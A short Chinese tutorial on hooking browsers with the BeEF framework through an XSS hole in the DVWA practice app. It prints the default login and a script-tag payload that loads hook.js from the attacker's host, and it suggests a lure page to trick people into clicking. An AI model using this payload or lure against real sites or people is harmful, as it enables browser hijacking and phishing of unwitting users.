打开kali图形界面,点击beef start开启beef
可能自动弹出beef界面,如果没有弹出,可以在浏览器内输入命令行界面的URL访问,在beef登录界面输入beef的默认用户名和密码:beef/beef登录beef界面,
登录后,将<script src='http://IP(运行beef主机的IP):3000/hook.js'></script>插入存在xss漏洞的表单中,本人选取了DVWA的普通难度的XSS漏洞处
之后beef界面就会出现浏览信息部分,显示访问者的IP,由于是本机访问的虚拟机,显示的是网关的IP
还可以直接构造一个html脚本,诱使人点即进入,脚本内容如下
可以达到同样的效果,
可以根据需求将页面跳转到其他网址,也可以根据需求,用beef将网址自动跳转到指定的URL
